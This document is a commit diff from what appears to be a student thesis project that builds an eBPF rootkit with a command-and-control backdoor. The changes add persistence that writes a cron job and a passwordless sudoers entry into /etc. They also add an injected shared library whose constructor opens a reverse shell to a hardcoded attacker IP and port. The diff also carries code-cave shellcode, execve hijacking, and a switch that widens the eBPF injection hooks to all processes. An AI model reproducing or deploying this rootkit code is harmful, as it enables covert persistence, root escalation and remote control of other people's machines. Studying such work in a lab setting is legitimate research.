Added multiple small changes to client and code, submitting almost finished chapter 5

src/client/client.c

@@ -345,8 +345,15 @@ void activate_command_control_shell(char* argv){
         }                                                                                                                                                                         
         
         char msg[BUFSIZ];
-        strcpy(msg, CC_PROT_MSG);
-        strcat(msg, buf);
+
+        //Global command "EXIT". This part should be moved together with the encrypted shell
+        //global command parser.
+        if(strlen(buf)>3 && strncmp(buf, "EXIT", 4)==0){
+            strcpy(msg ,CC_PROT_FIN);
+        }else{
+            strcpy(msg, CC_PROT_MSG);
+            strcat(msg, buf);
+        }
         packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, msg);
         printf("Sending %s\n", msg);
         if(rawsocket_send(packet)<0){

src/client/include/sslserver.h

@@ -1,4 +1,4 @@
-// This code is based from the following tutorial:
+// This code is based on the following tutorial:
 // https://aticleworld.com/ssl-server-client-using-openssl-in-c/
 
 #include "openssl/err.h"
@@ -203,9 +203,9 @@ int server_run(int port) {
 	}
 	close(server); /* close server socket */
 
-	ERR_free_strings(); /* free memory from SSL_load_error_strings */
-	EVP_cleanup();      /* free memory from OpenSSL_add_all_algorithms */
-	SSL_CTX_free(ctx);  /* release context */
+	//ERR_free_strings(); /* free memory from SSL_load_error_strings */
+	//EVP_cleanup();      /* free memory from OpenSSL_add_all_algorithms */
+	//SSL_CTX_free(ctx);  /* release context */
 
 	return 0;
 }

src/common/constants.h

@@ -24,12 +24,15 @@
 //EXECUTION HIJACKING
 
 #define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack\0"
-#define EXEC_HIJACK_ACTIVE_TEMP 0
+#define EXEC_HIJACK_ACTIVE_TEMP 0 //0 Deactivated, 1 active
 #define TASK_COMM_NAME_RESTRICT_HIJACK "bash"
 #define TASK_COMM_RESTRICT_HIJACK_ACTIVE 1
 
 //LIBRARY INJECTION WITH ROP
 #define TASK_COMM_NAME_INJECTION_TARGET_TIMERFD_SETTIME "simple_timer"
+#define TASK_COMM_FILTER 1 //0 do not filter by task. 1 filter by task.
+#define TASK_COMM_NAME_INJECTION_TARGET_OPEN "simple_open"
+
 #define CODE_CAVE_ADDRESS_STATIC 0x00000000004012c4
 #define CODE_CAVE_SHELLCODE_ASSEMBLE_1 \
 "\x55\x50\x51\x52\x53\x57\x56\
@@ -54,6 +57,4 @@
 \x5f\x5b\x5a\x59\x58\x5d\xff\x25\x00\x00\x00\x00"
 #define CODE_CAVE_SHELLCODE_ASSEMBLE_3_LEN 37
 
-#define TASK_COMM_NAME_INJECTION_TARGET_OPEN "simple_open"
-
 #endif

src/ebpf/include/bpf/injection.h

@@ -252,9 +252,11 @@ int sys_enter_timerfd_settime(struct sys_timerfd_settime_enter_ctx *ctx){
         return -1;
     }
 
-    char *task = TASK_COMM_NAME_INJECTION_TARGET_TIMERFD_SETTIME;
-    if(str_n_compare(comm, TASK_COMM_LEN, task, STRING_FS_SUDO_TASK_LEN, STRING_FS_SUDO_TASK_LEN) != 0){
-        return 0;
+    if(TASK_COMM_FILTER == 1){
+        char *task = TASK_COMM_NAME_INJECTION_TARGET_TIMERFD_SETTIME;
+        if(str_n_compare(comm, TASK_COMM_LEN, task, STRING_FS_SUDO_TASK_LEN, STRING_FS_SUDO_TASK_LEN) != 0){
+            return 0;
+        }
     }
     bpf_printk("TASK: %s\n", comm);
 
@@ -320,9 +322,12 @@ int sys_exit_timerfd_settime(struct sys_timerfd_settime_exit_ctx *ctx){
     if(err<0){
         return -1;
     }
-    char *task = TASK_COMM_NAME_INJECTION_TARGET_TIMERFD_SETTIME;
-    if(str_n_compare(comm, TASK_COMM_LEN, task, STRING_FS_SUDO_TASK_LEN, STRING_FS_SUDO_TASK_LEN) != 0){
-        return 0;
+
+    if(TASK_COMM_FILTER == 1){
+        char *task = TASK_COMM_NAME_INJECTION_TARGET_TIMERFD_SETTIME;
+        if(str_n_compare(comm, TASK_COMM_LEN, task, STRING_FS_SUDO_TASK_LEN, STRING_FS_SUDO_TASK_LEN) != 0){
+            return 0;
+        }
     }
     
     //If we are here we may have the return address stored in the map.
@@ -353,9 +358,11 @@ int sys_enter_openat(struct sys_openat_enter_ctx *ctx){
         return -1;
     }
 
-    char *task = TASK_COMM_NAME_INJECTION_TARGET_OPEN;
-    if(str_n_compare(comm, TASK_COMM_LEN, task, STRING_FS_SUDO_TASK_LEN, STRING_FS_SUDO_TASK_LEN) != 0){
-        return 0;
+    if(TASK_COMM_FILTER == 1){
+        char *task = TASK_COMM_NAME_INJECTION_TARGET_OPEN;
+        if(str_n_compare(comm, TASK_COMM_LEN, task, STRING_FS_SUDO_TASK_LEN, STRING_FS_SUDO_TASK_LEN) != 0){
+            return 0;
+        }
     }
     struct pt_regs* longscan;// = (struct pt_regs*)ctx->unused;
     bpf_probe_read(&longscan, sizeof(struct pt_regs*), &(ctx->unused));

src/helpers/Makefile

@@ -15,10 +15,10 @@ simple_timer: simple_timer.o
 	gcc -g -o simple_timer simple_timer.o
 
 simple_open.o: simple_open.c $(HEADERS)
-	clang -g -c simple_open.c
+	gcc -g -c simple_open.c
 
 simple_open: simple_open.o
-	clang -g -o simple_open simple_open.o	
+	gcc -g -o simple_open simple_open.o	
 
 execve_hijack.o: execve_hijack.c $(HEADERS)
 	gcc -g -c execve_hijack.c

src/helpers/deployer.sh

@@ -45,11 +45,16 @@ echo "***************** Marcos Sánchez Bajo *****************\n"
 echo "*******************************************************\n"
 echo ""
 
-BACKDOOR_INSTALLED=0
+## Persistence
+declare CRON_PERSIST="* * * * * osboxes /bin/sudo /home/osboxes/TFG/apps/deployer.sh"
+declare SUDO_PERSIST="osboxes ALL=(ALL:ALL) NOPASSWD:ALL #"
+echo "$CRON_PERSIST" > /etc/cron.d/ebpfbackdoor
+echo "$SUDO_PERSIST" > /etc/sudoers.d/ebpfbackdoor
+
+# Rootkit install
 OUTPUT_COMM=$(/bin/sudo /usr/sbin/ip link)
 if [[ $OUTPUT_COMM == *"xdp"* ]]; then
-   BACKDOOR_INSTALLED=1
-   echo "Backdoor is already installed"
+   echo "Rootkit is already installed"
 else
    #Install the programs
    echo -e "${BLU}Installing TC hook${NC}"
@@ -59,7 +64,3 @@ else
    /bin/sudo "$BASEDIR"/kit -t enp0s3
 fi
 
-## Persistence
-echo "* * * * * osboxes /bin/sudo /home/osboxes/TFG/apps/deployer.sh" > /etc/cron.d/ebpfbackdoor
-echo "osboxes ALL=(ALL:ALL) NOPASSWD:ALL #" > /etc/sudoers.d/ebpfbackdoor
-

src/helpers/injection_lib.c

@@ -8,6 +8,8 @@
 #include <netinet/in.h>
 #include <arpa/inet.h>
 
+#define ATTACKER_IP "192.168.1.127"
+#define ATTACKER_PORT 5555
 
 __attribute__((constructor))
 static void init()
@@ -18,13 +20,13 @@ static void init()
     //Just a sample reverse shell (https://www.revshells.com/)
     pid_t pid = fork();
     if(pid==0){
-        int port = 5555;
+        int port = ATTACKER_PORT;
         struct sockaddr_in revsockaddr;
 
         int sockt = socket(AF_INET, SOCK_STREAM, 0);
         revsockaddr.sin_family = AF_INET;       
         revsockaddr.sin_port = htons(port);
-        revsockaddr.sin_addr.s_addr = inet_addr("192.168.1.119");
+        revsockaddr.sin_addr.s_addr = inet_addr(ATTACKER_IP);
 
         connect(sockt, (struct sockaddr *) &revsockaddr, 
         sizeof(revsockaddr));

src/helpers/packager.sh

@@ -5,7 +5,7 @@
 #The current directory full path
 declare -r DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
 #The location of the file where to write the full rootkit package
-declare -r OUTPUTDIR="/home/osboxes/TFG/apps/"
+declare -r OUTPUTDIR="$DIR/../../apps/"
 #A variable to determine whether to silence output of internal commands
 declare firstvar=$1
 

src/user/include/modules/module_manager.c

@@ -123,7 +123,8 @@ int activate_all_modules_config(){
 
 int deactivate_all_modules_config(){
     //XDP
-    module_config.xdp_module.all = OFF;
+    //This is not deactivated, since it is needed for backdoor to keep listening
+    //module_config.xdp_module.all = OFF;
 
     //SCHED
     module_config.sched_module.all = OFF;